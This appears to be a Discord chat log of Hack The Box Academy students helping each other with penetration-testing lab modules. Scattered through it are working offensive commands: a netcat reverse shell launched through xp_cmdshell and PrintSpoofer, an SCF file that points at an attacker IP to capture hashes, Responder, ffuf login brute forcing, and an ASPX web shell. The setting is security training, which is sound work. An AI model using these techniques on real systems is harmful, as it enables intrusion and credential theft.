#modules
How do you know that?
so as not to spoil anything, send me a dm
Is the DC$ user equivalent to domain admin?
Just solved it, thanks...
also I'm not sure how to prevent this exactly, if anyone up for a little sanity check on it (Broken Authentication > Skills Assessment), please
Another 1 bites the dust, maybe Freddie Mercury was a secret hacker on the quiet?
I've been trying to get a fully interactive TTY on the meterpreter shell I got by exploiting with Metasploit.
I couldn't use python, python2, python3, etc. for that.
However I was able to work through it by using
```sh
/bin/bash -i
```
This is much better but still much less functional.
Any idea what should be done here?
Hey I’m stuck on the server side attacks skill assessment module, anyone who has recently solved it?
What exactly is not working?
Umm, I'm having trouble figuring out how to approach the issue. None of the links on the page (menu etc.) seem to be vulnerable, and I didn't really find any directories through ffuf enumeration.
Have a look at the || source code ||
Hello, I have an issue - Windows Privilege Escalation - SeImpersonate and SeAssignPrimaryToken - Question 1:
After connecting with
```sh
python ~/Tools/impacket/examples/mssqlclient.py sql_dev@{IP} -windows-auth
```
I use
```
SQL (WINLPE-SRV01\sql_dev dbo@master)> enable_xp_cmdshell
```
with the response:
```
INFO(WINLPE-SRV01\SQLEXPRESS01): Line 185: Configuration option 'show advanced options' changed from 1 to 1. Run the RECONFIGURE statement to install.
INFO(WINLPE-SRV01\SQLEXPRESS01): Line 185: Configuration option 'xp_cmdshell' changed from 1 to 1. Run the RECONFIGURE statement to install.
```
But I fail to get a response for the whoami (or any other) command:
```
SQL (WINLPE-SRV01\sql_dev dbo@master)> xp_cmdshell whoami /priv
SQL (WINLPE-SRV01\sql_dev dbo@master)>
```
Do you have some ideas? I have been stuck here for quite a while now 😦 Thanks.
Did you run RECONFIGURE?
Both yes and no, on many resets of the box, neither way worked.
It won't work without it. You have to activate xp_cmdshell first.
Hi, could I get a little nudge for the File Inclusion skills assessment?
So connect → enable_xp_cmdshell → RECONFIGURE → xp_cmdshell {command}?
||
```sql
-- this turns on advanced options and is needed to configure xp_cmdshell
EXEC sp_configure 'show advanced options', '1'
RECONFIGURE
-- this enables xp_cmdshell
EXEC sp_configure 'xp_cmdshell', '1'
RECONFIGURE
```
||
@umbral fulcrum how do I go about it?? I got username=gladys&pass=dWinaladasD13 but it takes me to 2fa.php and from there it's a dead end.
Still no response 😦
Anyone else having issues with spawning targets? Mine hangs at "Target(s) are spawning..."
Hi, is there anyone available for a sanity check on the Dead Code module of Secure Coding 101: JavaScript?
Look in burp on that page, there’s something u can do
To understand it, I needed to explore all the options the application has.
Then I saw what I needed
the cookie?
Hi new here
Can someone help me in using burp
If you want to help them please DM me sir
DM if u want more elaborate hints, don’t want to spoil for others
What do you mean by no response?
I type xp_cmdshell whoami /priv and nothing happens, just get new line for new command.
Perhaps because xp_cmdshell is not activated?
It was activated. I was able to get a reverse shell using xp_cmdshell c:\PrintSpoofer.exe -c "C:\nc.exe IP PORT -e cmd.exe"
But only because I knew SeImpersonatePrivilege was enabled, as it was the point of the exercise. If I didn't, I'd just be stuck there.
Using pwnbox?
If so I think there's still the impacket issue on it
Where you need to reinstall it
In the API Attacks module, in the broken authentication part, I have tried brute forcing the OTP several times over and over again in less than 5 min with ffuf but it's not working (I am using a 6 digit OTP) and even tried logging in but it did not work. Did anyone encounter the same issue? Here is the wordlist I used: https://github.com/danielmiessler/SecLists/blob/master/Fuzzing/6-digits-000000-999999.txt
I even inspected my requests in Burp and they looked OK.
Not pwnbox, my kali vm. I will check the impacket versions tho, thanks
DM!
Take help from YouTube
Can someone help me with this section
"Introduction to Malware Analysis
Code Analysis
Reverse Engineering & Code Analysis"
Hi, I am trying to troubleshoot something. When I ran nmap from one VM in Parrot it gave me the answer I was looking for; when I ran the exact same thing from my Kali VM it would give the ports but not the info from the script. I tried searching, but other than nuking the VM, what could be wrong with nmap to cause it? It has been confusing me all day (both nmaps are running the same version).
I obviously can't really move on to the last lab in the Network Enumeration with Nmap module without fixing it, thanks.
I had the same issue: when I used their box I got the flag, but when I used my VM I got nothing.
Yeah, same, but then I created a new Parrot VM of my own and it worked fine, but my Kali instance wouldn't, so I am a bit confused. The Parrot instance for me keeps freezing after like 5 minutes no matter what resources I allocate, so I am trying to just sort out my lab, addressing it one issue at a time. I find it odd as I have used my Kali for loads of CTF boxes fine...
Is there a way to restart a module so I can do the updated version
No
ok thank you
https://academy.hackthebox.com/module/108/section/1233
Module: Vulnerability Assessment
Section: Nessus Skills Assessment
What IP am I supposed to run a scan on?
I might have run it on the wrong IP. I ran a scan on the 10.x machine IP.
Once logged in, perform a BASIC NETWORK SCAN (modify the scan template to scan ALL ports, leave all other options the same) against the target: 172.16.16.100. Additionally, set up the scan to be authenticated using administrator:Academy_VA_adm1! as the credentials.
But I can't even ping this IP: 172.16.16.100
So I'm supposed to run scan on the machine IP I guess
It says the scan will take one hour, but for me
Start: Today at 6:53 AM
End: Today at 7:11 AM
Elapsed: 17 minutes
I didn't find anything the questions are asking about. I'm very confused.
So you are using the Nessus vuln scanner that is installed on one computer to scan another computer that you don't have direct access to.
No I'm using the web interface at https://10.129.78.137:8834/
I'm on the academy VPN
What IP am I supposed to scan?
I don't have nessus installed myself anywhere
Sorry if I misunderstood you
Right, you're on the VPN and can access 10.129.78.137:8834. In turn, 10.129.78.137 is multihomed and can access 172.16.16.100.
You --> VPN --> Nessus --> Target.
I'll try scanning that from Nessus then.
Yes, you won't be able to access or so much as ping 172.16.16.100 directly from your attack system.
Hello, I need help with the Command Injection skills assessment. I use || after a to= and I think there is a filter. I think I have tried everything, but maybe there is something I do not understand. If there is someone who can help me understand the problem, please.
Try on something that is doing a command not just showing the file
If I remember correctly u may get an error that reveals a command being executed
Try play around with the website
Yes, try all the options in the module to bypass the filters, and mess around with the website to see what you might be able to use
I think I have used all even whoami
Try to find an option other than view
I looked at my PoC to get command execution; all I can say is it took me trying a few different combinations of filter bypasses (all from the cheat sheet) and modifying parameters of the website URL as part of it.
I will reread all the courses because it is too obscure for me. I really tried everything, I even tried the ajax parameter, but nothing.
i am russian
epic
can anybody assist me with the logrotate exploit from the Linux LPE module?
I get the
```sh
Waiting for rotating <redacted>
Renamed backups with backups2 and created symlink to /etc/bash_completion.d
Waiting 1 seconds before writing payload...
```
and trying it again fails
nvm got it working
so unreliable
why does echoing it beforehand work better lol
It's not something you didn't understand.
In the skills assessment you have a site with files and you've got three options:
View
Copy
Move
Which one of those do you think is doing something in the backend, aka doing command execution?
Try to use something simple like (pwd) and try to apply every bypassing method you have learned.
Do yall know where i can find help about tor broswer?
Try asking in the general this room is for the modules only
Cant talk in general
Follow the instructions in #welcome
@rustic sage
whoops, I replied to the wrong person there, sorry
Np
OK, the module that uses ODAT needs to be updated to not provide the "installation" script. The pentest flavors of Linux make it difficult to install it that way, especially if you're using an Arch-based system instead of a Debian-based one. The install from the ODAT GitHub does work though... so far.
I wasted too much time trying to fix that script... it probably would have been fine had I built my own Arch system, but the preconfigured systems make the pip install stuff not work properly.
All software installations shown are basically for the PwnBox. Does it work in the PwnBox?
Not sure, haven't tried that. I'm using an AthenaOS VM, but I did try it with a Kali VM and had similar problems since the Python environments are locked down on them. So the pip3 stuff doesn't work; it wants you to use pipx, but then pipx wants you to use pip since it's a library.
You can remove the EXTERNALLY-MANAGED file
Yeah, I just always worry about doing stuff like that on preconfigured systems cause I don't know how much or what exactly if anything that would break
It doesn't break much of anything
Oh, OK, nice. I really just need to spend the time and build myself a nice little NixOS box so I can just use tools on the fly as needed instead of having to bloat the entire system for a task.
I use parrot myself
What path do i do after infosec?
It depends on what do you want out of your life
Can you guys help me out? What steps should I take to make sure that I will pass the CPTS? What I do is I read the entire module, then I make a summary for myself, then do the exercises by referencing the module. Am I doing it right, or should I do something else?
I want to be a pentester/ethical hacker
Me too
How do you make summary? And how much time does it take you to make summary?
First im getting the cpts, then i will do htb labs and ctftime
Explain to yourself what is going on
Hey all, I'm currently working on AD and on using Inveigh. I ran the ps1 script but there was no hash in the output, and I also checked the txt file of the log and there was no hash there either. IDK where I'm going wrong. Any help will be appreciated.
Sounds like you're doing it the way I do. Practice to feel comfortable with the processes and explore things on your own. Being a hacker is fiddling with all the options, trying multiple ways and deciding which you prefer and which is a backup in case the first one doesn't work. ¯\_(ツ)_/¯
Can you send pic of one of your summaries
Do the exercises as you learn them
I don't have any right now but it goes like this: "To hack FTP, first run an nmap scan on port 21 with default scripts; after detecting what FTP service is used, run nmap scripts that will show more info about that process, then check for anonymous login..."
What do you mean?
That's only if ftp is running on default port
Aka do it as you read the section
That's true, always do a full port scan.
Aye guys looking to start a group if anybody interested hmu!!!🤙🏻
So the steps are 1 read 2 take notes 3 do exercises 4 done learning
Heck half of my notes in the web modules is me doing the question for it and screenshotting the process
As the examples don't always match the practical
@marble island Oh shit i've been doing it wrong this whole time! i've been going straight to the attacks....
There's no "wrong way"
IK
Unless you're just cheating by following writeups/videos
I was just being facetious
nope don't look up that shit until i'm certain it's a module issue lol
But otherwise the right way is the way that helps you retain the knowledge
What I am doing is that I just get familiar with the concepts, know where the knowledge that I will need for the CPTS is, and that's it.
The knowledge level you'll need is what's taught
- resourcefulness
No matter what I do I always forget the commands and the specifics.
Like, my port scan found SMB, I know that there is an SMB section in the Footprinting module.
There's other tools out there not well listed or used by the pentest flavors of linux. Github has lots of great projects out there
My new strategy is: read the module, do a summary of what I read, do the exercises (see the solution if I'm stuck), then I will know where to go back to when I'm doing the CPTS.
Ok folks. I am stuck on the Web attacks skills assessment. I have identified the || admin user || , the || token|| for || uid 52|| . I changed the || uid in storage from 74 to 52 || and then go to the profile page and I see I am || The admin user, however I am unable to change the password I get access denied, I think because I have the session cookie of the htb-student user. I tried changing from a POST to a PUT, and I get missing parameters. || I have fuzzed for the parameters using FFUF and am coming up empty|| Can someone nudge me, I don't want the answer, but i'm clearly missing something.
You don't need to remember specifics tbh
I think i will pass doing this am i right?
Most sections are designed to be done as you read them
it's not like one of those absolute book answer question tests.
Looking at you PPL!
(Just don't be surprised if something doesn't work as the example)
Always be flexible in your methods
let me rephrase that for you. Expect the example to not even be close to working....
While the example might not work; the method can still apply
Is the method 1) read 2) make a summary 3) do the exercises 4) do the skills assessment, then write an explanation of what I did, a good method?
Nah some examples are 1::1
i've run into examples not working more times than i would have thought honestly, and i think a lot of it is just the difference in systems
some...but i've run into a lot that won't work on anything not the pwnbox
Not really a difference of systems. Just a difference of skill
is this good?
sure, I mean I wrote a python script that kinda walks you through the step of tools for what phase you're on...
it's like notes but more interactive
wait what? you did a python script that does what?
If it works for you. That's what's important
Basically you enter the target(s), then it has a list of tools it calls for whatever step you're on, and then for each tool it has a list of different attack options... just automates things a little bit. Lets you drink more coffee.
gee thats overkill
i like making my life easier :-p
Eh automating the process really only works if you understand it
oh right
And for the exam you'd still need to prove you know what you're doing via the report
what did you 2 do to learn the modules and pass the cpts?
true, I do need to add in automation to report generation :-p thanks for the idea
That's not how that works lol
You need to follow the template
haven't taken cpts yet still going through modules.
and you can't automate that? :-p (openvas, maltego)
No
there are most definitely expensive automated tools that generate detailed reports for you
Besides if you use sysreptor the template is basically right there
You still need to input info
eww
How did you pass the CPTS @fathom pendant?
I haven't taken it
I'm gonna steal facebooks thought stealing technology and you just think it and the report fills itself out for you
How would you go about studying the modules if you where to take the cpts?
I just do, and write out my process of performing the exercises
Documenting w/ screenshots and such
I use Obsidian for my notes
write the process of performing the exercises? I think i am going to do that
Isn't Obsidian dirty proprietary software?
works good for me
free as in freedom?
I have all my notes synching to git every 2 mins
I use CherryTree
And there's a plugin for everything
Ah I see you're a Chad git extension enjoyer
Use em if they are there I say 🙂
gitchad should definitely be a website
i succeeded 🥲
I will try Obsidian, thanks for the tip. I did not see the GitHub link on their main website and thought it to be proprietary.
congrats👍
Cheatsheets for HTB copy over nicely in markdown to Obsidian.
They have the download on their site as well
I have a question regarding report writing in general. I am currently doing the ANE module and found tons of vulnerabilities and want to write findings on them all, but what if in real life I didn't manage to find ALL the vulnerabilities or write them up, but instead put in the ones that got me initial access? Would that affect my score in the CPTS exam and get me rejected?
I hadn't seen the little copy mv option and was concentrating on the url ?to= request.
It's best to write all vulns you find
And you can't write about a vuln you don't find
BTW, is anybody a pentester? How would you people go about getting a pentester job? My strategy is to do the CPTS, then start doing the HackTheBox labs to train for CTFs, then do CTFs until I either get it from winning a CTF or from an impressive CTFtime score. I live in Brazil and would like to get a pentester job abroad.
try and make the best out of it 🙂
i do but i talk about the case of "what if" would they fail me for it?
Your attack path will include the vulns you used
anyone able to give the the slightest of nudges ? I found the way, within a few minutes, but am struggling to execute it
No one can answer that, as it's technically exam content
Think about the info you'd want if you're the client
I mean, say there is XSS found in one subdomain out of 10, and in those 10 subdomains you didn't find that XSS but you found command injection that gave you initial access and then wrote a report based on that. Would HackTheBox fail you for not writing up that XSS that you didn't find?
Let me check my notes. I feel I just did that one recently.
And just because you couldn't exploit it, doesn't mean another attacker couldn't
How would you know the xss is there if you couldn't find it

I don't, but those who wrote the exam do. What if they say "skill issue" and then fail me for it?
They grade the exam based on what you found. And your report info
They're grading it as the company contracting you, and they don't know all the vulns
But again your questions are getting specific to the exam grading. Which cannot be answered by anyone
thats better to know but i'll write everything just in case in my exam
Write everything you find. Always. As a customer, I'd be pissed if you found a vuln but didn't tell me about it
How would you people go about getting a penetration tester job?
Start in IT
Get your foot in the door with tech
I work as a Linux sysadmin in a hospital.
As the market is saturated af with already skilled/talented individuals
Then reach out internally to see if positions are open
Otherwise just search.
Why are you trying ||PUT|| only?
You know that hospitals have crap opsec? I did a pentest for them.
If you haven't looked at the reset password function, I would give it a look.
@marble island if you read and follow #welcome you can access #careers-and-certs which is a better channel for your question
I tried the others as well
No access
First part of my statement
feel free to dm me
Yes, I am there and am getting access denied on some method, other method it says || missing parameters||
You can DM if you would like.
👀
hey! sorry for randomly jumping on this message. Can you tell how to enable smb capture?
Are you good now?
Yes, thank you. I assumed incorrectly one Verb would not work, when I tried that I got it
Hi, this command isn't working:
```sh
cp /usr/share/laudanum/aspx/shell.aspx /home/tester/demo.aspx
```
Getting a "cannot create regular file" error.
This is for the Laudanum section of the Shells & Payloads module.
```sh
┌─[us-academy-4]─[10.10.15.126]─[htb-ac-605555@htb-zdxwfht2u6]─[~]
└──╼ [★]$ cp /usr/share/laudanum/aspx/shell.aspx /home/tester/demo.aspx
cp: cannot create regular file '/home/tester/demo.aspx': No such file or directory
┌─[us-academy-4]─[10.10.15.126]─[htb-ac-605555@htb-zdxwfht2u6]─[~]
└──╼ [★]$ sudo cp /usr/share/laudanum/aspx/shell.aspx /home/tester/demo.aspx
cp: cannot create regular file '/home/tester/demo.aspx': No such file or directory
```
wait fixed it
I think I fixed it, I made the /home/tester folder. I wanna see if the tutorial works anyway; I might have figured it out on my own.
I figured it out on my own never mind
Why not just copy to your home?
In this instance [tester] is you
I am trying to triage an issue. It's on my end but I don't know what else to do: when I run nmap it won't run scripts, which stops me from moving on with Network Enumeration with Nmap. I tried different OS instances;
on different devices it works, except in my own VMware Workstation lab. What could cause this?
I know a workaround is to use the Pwnbox, but if nmap isn't working properly I can't really do CTFs and know what I am getting back is accurate.
I'm currently on Detecting Windows Attacks with Splunk, authenticating with the credentials they gave me, but it's not working: "connect to DC1 (172.16.18.3) as 'htb-student:HTB_@cademy_stdnt!'". I'm using the xfreerdp command. Has anyone else run into this issue?
hey everyone. can someone share some detailed notes from the dacl attacks i and ii modules please?
Some of the sections in nmap just work better in pwnbox
You'll need to make your own notes
Other peoples' notes do you no good, as they wrote their notes to understand it for themselves
So it may not be a me issue, it's just a case of it working better in this instance, because I even tried the HTB version of Parrot on my VM.
no I meant the iso from parrot website
Htb edition is just security edition with some minor theming
ohh sorry misread
So the best port of call moving forward for modules is to use the Pwnbox and just take notes?
alright thanks, it has been driving me nuts
You can use your own vm
It's just only occasionally that for whatever reason pwnbox just works
ok cool, thanks for that, it worked on other devices but I will just move on now, thanks for your response
Version difference of tools can also affect outcomes
Yeah, they were all on 7.9.4, which is the latest version of nmap. Doesn't matter, I will just use the Pwnbox for the hard lab, then I can quit moaning haha.
The hard lab is pretty simple once you figure out the source of it
remove unnecessary instructions. DM if still stuck.
Hey everyone, I'm currently on the Medium lab of IDS/IPS Evasion with nmap. The task is to retrieve the DNS server version, which I thought I had completed, but it isn't the correct answer. Willing to send screenshots in a DM so as not to spoil anything for anyone else.
You can try connecting directly with netcat, otherwise try with the pwnbox.
Apologies, I'm a little confused by that tip. I was able to connect to the target and retrieve information from the nmap scan, which included a version return (possibly incomplete, which is why the answer appears wrong?). The IPS seems to block an nc connection. My scan was only able to retrieve the version information with a UDP scan.
Update: the exact same command worked with the Pwnbox. Thanks for the help! Didn't realize that could be an issue.
Reading upwards a bit, I see that someone else had a similar situation on another module. Just for my own curiosity's sake: if the personal VM and the Pwnbox are using the same version of nmap, what makes the results change?
Which is intended
It can, slight differences can cause issues
Attacking Common Applications Attacking GitLab - User Enumeration.
Okay, what wordlist should I be using? I've found 10 users, and 8 of the 10 are made by other people. I've used a number of the wordlists in ||seclists/usernames|| (the shorter lists, and running a longer one now) and still haven't found the actual user they're wanting. ||go for defaults||
oh well I wasn't thinking of that lmao
thank you I'm an idiot
😆
That would be best to ask in #careers-and-certs
I was curious about this nmap issue you were speaking about, so I quickly re-ran the nmap medium and hard labs to see if anything had changed since I first did them.
On freshly spawned targets it works as expected from my Parrot VM, same nmap version as yours. During the CPTS path, I think I never had to use the Pwnbox to get an answer.
Also, I saw earlier you had an issue with Parrot freezing. I encountered the same kind of issue with Parrot or Kali: a keyboard lag leading to the whole thing freezing. A solution for me, with an Intel processor, was to check the Virtualize IOMMU option under processor settings. Otherwise I have the processor setting at 2 processors, 2 cores, then a fair amount of RAM.
Hello, has anyone done Broken Authentication?
```sh
ffuf -w list/multiplesources-users-fabian-fingerle.de.txt:FUZZ -u http://94.237.49.212:59399/index.php -X POST -H "Content-Type: application/x-www-form-urlencoded" -d "username=FUZZ&password=invalid" -fr " Unknown user."
```
I am fuzzing the username; is there any mistake in this command?
The only issue I can see is the file you are using for the wordlist. I used xato-net-10-million-usernames.txt and it worked for me.
I have also used this wordlist:
```sh
└─$ ffuf -w Downloads/xato-net-10-million-usernames.txt:FUZZ -u http://94.237.49.212:59399/index.php -X POST -H "Content-Type: application/x-www-form-urlencoded" -d "username=FUZZ&password=invalid" -fr " Unknown user."

        /'___\  /'___\           /'___\
       /\ \__/ /\ \__/  __  __  /\ \__/
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
         \ \_\   \ \_\  \ \____/  \ \_\
          \/_/    \/_/   \/___/    \/_/

       v2.1.0-dev

 :: Method           : POST
 :: URL              : http://94.237.49.212:59399/index.php
 :: Wordlist         : FUZZ: /home/hasnain/Downloads/xato-net-10-million-usernames.txt
 :: Header           : Content-Type: application/x-www-form-urlencoded
 :: Data             : username=FUZZ&password=invalid
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
 :: Filter           : Regexp: Unknown user.

:: Progress: [1/8295455] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:00] :: Errors: 0 ::
:: Progress: [40/8295455] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:00] :: Errors: ::
:: Progress: [40/8295455] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:00] :: Errors: ::
:: Progress: [40/8295455] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:00] :: Errors: ::
:: Progress: [73/8295455] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:00] :: Errors: ::
:: Progress: [73/8295455] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:00] :: Errors: ::
:: Progress: [80/8295455] :: Job [1/1] :: 0 req/sec :: Duratio
```
Try removing the :FUZZ after the file name. That should help.
And watch closely for a result to pop up. As soon as one does, stop the scan and see what the result is
```sh
ffuf -w Downloads/xato-net-10-million-usernames.txt -u http://83.136.255.40:44527/index.php -X POST -H "Content-Type: application/x-www-form-urlencoded" -d "username=FUZZ&password=invalid" -fr " Unknown user."

        /'___\  /'___\           /'___\
       /\ \__/ /\ \__/  __  __  /\ \__/
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
         \ \_\   \ \_\  \ \____/  \ \_\
          \/_/    \/_/   \/___/    \/_/

       v2.1.0-dev

 :: Method           : POST
 :: URL              : http://83.136.255.40:44527/index.php
 :: Wordlist         : FUZZ: /home/hasnain/Downloads/xato-net-10-million-usernames.txt
 :: Header           : Content-Type: application/x-www-form-urlencoded
 :: Data             : username=FUZZ&password=invalid
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
 :: Filter           : Regexp: Unknown user.

:: Progress: [40/8295455] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:00] :: Errors:
```
same issue
Are you sure it's on index.php?
Maybe it's on another page, some login.php?
Try adding /timeout:10000 and also wrap your password in quotes due to the special characters. If that doesn't work, switch regions.
yes i am sure
Which section are you in?
Your command isn't the exact same as the example, not sure if that's your problem though.
All that I can think of is that you didn't get the VPN files to work well, or that your wordlist doesn't have the valid username.
Your command is fine, I just ran it and got the answer. Maybe switch VPNs.
The one I use has 8295455 usernames.
ok thanks
hello
The sudo responder -wrf -v -I tun0 command appears fine in the case, but I started the Pwnbox incorrectly.
It looks like, between the versions you are using, the -r option was removed.
there's also the -h flag you can use
Hey buddy, I also downloaded the latest version on Github
great, the repo documentations will tell you what flags you can use, so will -h
I was wondering why the Pwnbox doesn't have python2 built in.
Oh, so I typed the wrong version.
Hey, this title is "capturing SCCM_SVC hash", but I only have htb-student traffic.
module and section?
okay got it
Good morning, has anyone finished Exploiting Web Vulnerabilities in Thick-Client Applications?
I am at the fatty-client.jar application... I have finally managed to install Java 8 but now I get this error when I try to run it.
don't run as root
also don't they provide you a machine with java already installed?
The target machine you RDP into already has Java installed.
But I give up trying to solve the module using the Windows machine...
The window of the machine looks super small and I could not get the new fatty-client file to run...
Now I am trying to solve it with the Pwnbox.
use remmina or add /dynamic-resolution to your xfreerdp command
seems a lot of people had trouble with this module...
I am using remmina
lets see if I manage 🙂 for sure I will ask more things! thank you!
Is there a study plan for cpts like oscp?
@next bronze Can you give me a hint?
the Penetration Tester job role path is the course for the CPTS certification
I have no idea what module and section you're doing
Yeah, what about having a 12 week plan, kind of thing?
Is that there
you will have to make a schedule for yourself
OK, but what are you actually doing here? Make an SCF or LNK file and point it to your own IP, then capture the hash.
everyone learns differently, so something like that has to be made by the student
make a scf or lnk file and point to your own ip
did you rename the extension after saving it in notepad?
it's also on the desktop and not in a share
Why can't I traverse into the Desktop directory as a normal user?
because that's root's desktop
But what about the permissions for other users? Do they not apply?
execute permission is there
You mean my (IconFile=\\10.10.14.101\share\legit.ico) should be IconFile=\\10.10.14.101\legit.ico? @next bronze
the root dir has special restrictions, why do you want regular users to access stuff in root's desktop anyways?
I suggest to read the section again
This can be particularly useful if we gain write access to a file share that looks to be heavily used or even a directory on a user's workstation.
place the file in the target's share
Hello, in the Attacking Enterprise Networks module - Lateral Movement section, does anyone know the password for the BloodHound instance they suggest using here? They don't give it on the section's page.
just experimenting
it's my own VM
Is that what it means?
so permissions don't count as root has special restrictions?
yes, you can experiment in other dirs like /tmp, messing with permissions in /root is a bad idea
sure but what other ways can you access and place files in smb shares?
you go ask them the password
He cannot show their password
guess you're out of luck then
I try it but FAILED
guess you'll just have to use your own internet
Any application to find out any Wi-Fi password?
Hi everyone,
in the Linux Fundamentals module, System Information lesson,
I couldn't submit the answers for
"What is the path to htb-student's home directory?" and
"What is the path to the htb-student's mail?"
I'm sure I'm entering them correctly but it shows wrong answer.
Hello, why can't I turn on Active Directory Users and Computers after following the steps to join the domain?
https://academy.hackthebox.com/module/74/section/1393
looks like you need to log in as a domain admin
anyone knows?
I can't find where the domain admin is on this page
This step is not mentioned in the solution
https://academy.hackthebox.com/module/74/section/1393
The section provides 2 sets of credentials, did you try the one that says "utilize xxx account to join the host to the domain"?
xfreerdp /v:10.129.80.249 /u:htb-student /p:'Academy_student_AD!' /timeout:1000 /cert:ignore
[05:45:48:027] [2825:2826] [ERROR][com.freerdp.core.connection] - Timeout waiting for activation
[05:45:48:032] [2825:2825] [ERROR][com.freerdp.core] - freerdp_abort_connect:freerdp_set_last_error_ex ERRCONNECT_CONNECT_CANCELLED [0x0002000B]
keep getting this error any help?
looks like it timed out. maybe change regions. also might want to increase your timeout value.
No
─[eu-academy-3]─[]─[htb-ac-1104324@htb-qbbbwtcm8y]─[~]
└──╼ [★]$ sudo lsof -i :80
COMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME
python3 3756 htb-ac-1104324 3u IPv4 36910 0t0 TCP htb-qbbbwtcm8y.htb-cloud.com:http (LISTEN)
python3 135647 htb-ac-1104324 3u IPv4 36910 0t0 TCP htb-qbbbwtcm8y.htb-cloud.com:http (LISTEN)
python3 135647 htb-ac-1104324 4u IPv4 333171 0t0 TCP htb-qbbbwtcm8y.htb-cloud.com:http->94-237-75-116.sg-htb1.upcloud.host:47912 (ESTABLISHED)
python3 198574 htb-ac-1104324 3u IPv4 36910 0t0 TCP htb-qbbbwtcm8y.htb-cloud.com:http (LISTEN)
python3 198574 htb-ac-1104324 4u IPv4 481084 0t0 TCP htb-qbbbwtcm8y.htb-cloud.com:http->94-237-75-116.sg-htb1.upcloud.host:39734 (ESTABLISHED)
port 80 doesn't really matter since you're trying to farm hashes from smb
sudo python3 Responder.py -I tun0 -w -v
$scfContent = @"
[Shell]
Command=2
IconFile=\\<your_ip_address>\icon.ico
[Taskbar]
Command=ToggleDesktop
"@
$scfFilePath = "C:\Department Shares\Public\IT\test.scf"
Set-Content $scfFilePath -Value $scfContent -Force
He doesn't seem to have taken any of the other users
help me
good job you should probably delete that pic though
thank you for your help
sure
but only image can successfully log in from xfreerdp
check if you have spelled the password correctly
i thought i would find it with same pwnbox without ssh,
now good, i manage to find the correct answers with the appropriate ssh connection.
thank you !
in the Python Library Hijacking section of the Linux LPE module, there is a SUID py3 file that we can run. However, if we hijack a library and add our own os.system("id") code, the SUID binary (when run) outputs the id of htb-student rather than root. If I do the same via sudo, however, it runs as root. Does this mean I can't python lib hijack SUID scripts?
I assume this is because the binfmt extension actually makes it run /usr/bin/python script.py, so the executable is actually /usr/bin/python, which is not SUID?
Hi, I am doing https://academy.hackthebox.com/module/57/section/516. I have generated the username list using anarchy and password list using cupp from the hint. But I am not able to get successful login. Any hints please?
I can't answer for the details as to why because it was quite some time ago, but I do recall a project where I had to write a stub program in C to compile and run as SUID after learning you couldn't apply that permission to scripts. It is a security thing. And, so I can confirm that part for you at least.
yeah /bin/sh drops privileges now, it's a security feature
but I think the reason python does it is slightly different 😄
I'm not at my PC to check the module, but you should use the neo4j creds to login to the bloodhound gui. It's different if you're using the CE version, but I don't recall that in the modules.
I'm really stuck and can't seem to get past this module Information Gathering - Web Edition -> Virtual Hosts. The task is to bruteforce virtual hosts on the target system. but it's not working i have tried almost all the tools like gobuster ffuzz and others but it seems that i can't succesfully find the full domain of "web" and others can someone please help me in the right direction?
i eventually used PowerView instead of bloodhound. Thank you!
I have a question
anyone?
Is there a machine that can read and emulate RFID signals, not the Flipper Zero though?
Proxmark?
Does it need a laptop to work @bright quiver
no, not necessarily, you can use it in standalone mode; the older version you can pair with a Raspberry Pi or laptop
OK thanks, do they sell it on Amazon?
I don't think so, but they are quite expensive for the OEM one; the functions they have are worth the price though. Proxmark 3 RDV4 can be used in standalone mode
lab401 have them and they are original and they ship worldwide I think https://lab401.com/products/proxmark-3-rdv4
keep in mind this is the best of the best tool that you can get and outperforms any Flipper Zero in function, but requires that you have knowledge about NFC and frequency blocks and stuff
You can DM what you have done so far.
Sure thanks!
hello, why am I unable to connect to rdp?
I'd need to do some troubleshooting to figure that one out. Are you in the same network at the target; is the port open; etc.. What module/section are you on could help clarify things.
thanks for the help, I looked it up online and figured out a way
Hi all, I'm doing the lab in Information Gathering - Web Edition, Virtual hosts module. I added the IP address and domain name in /etc/hosts (94.237.59.199 inlanefreight.htb) and then enter the gobuster command (gobuster vhost -u http://inlanefreight.htb -w subdomains-top1million-110000.txt -t 50
), I'm getting the above error. Can anyone help me with this?
You need to --append-domain
Also you need to specify the port
Because there indeed isn't a web port on 80 for that target
gobuster vhost -u http://inlanefreight.htb:32343/ -w subdomains-top1million-110000.txt --append-domain
Go this error again after trying with that command
Antivirus is blocking the connection.
I tried with fuff tool
Well that would be your isp, not the target
You shouldn't be running any av on your vm
disable it then
Yeah, got it
I'll try it
love me in the metasploit module I have to compile a binary but Pwnbox has GLIBC 2.34+ but the remote server does not and also has no gcc so I can't compile a binary that works there 
I don't remember needing to compile anything... I just grabbed from a release
how the fuck do I run this from meterpreter 😂
I tried dropping into shell but it's non-interactive
What section? I genuinely don't recall compiling anything for meterpreter, maybe the msfvenom payloads
Oh... I didn't need to do any compiling
Just background the session, pull up the b* post-exploit, attach it to the session that your connection is on. And just run it
You might need to adjust the LPORT
And lhost
But I don't remember compiling anything
oh ffs it's a metasploit module
lmfao
yeah ok worked now
lol
thanks @fathom pendant
overthinking is the enemy
Hey, what should be the next step after I complete all the tiers in starting point?
you can move onto retired machines
Hi
why can't I post on general chat?
Oh ok
Is this cert going to be industry standard soon?
hopefully it will, it will take some time though
mail,google map,and i forget another one
i have already checked all directory
can some one help me?
https://academy.hackthebox.com/module/17/section/88
how to solve this assessment?i have already checked all the directory
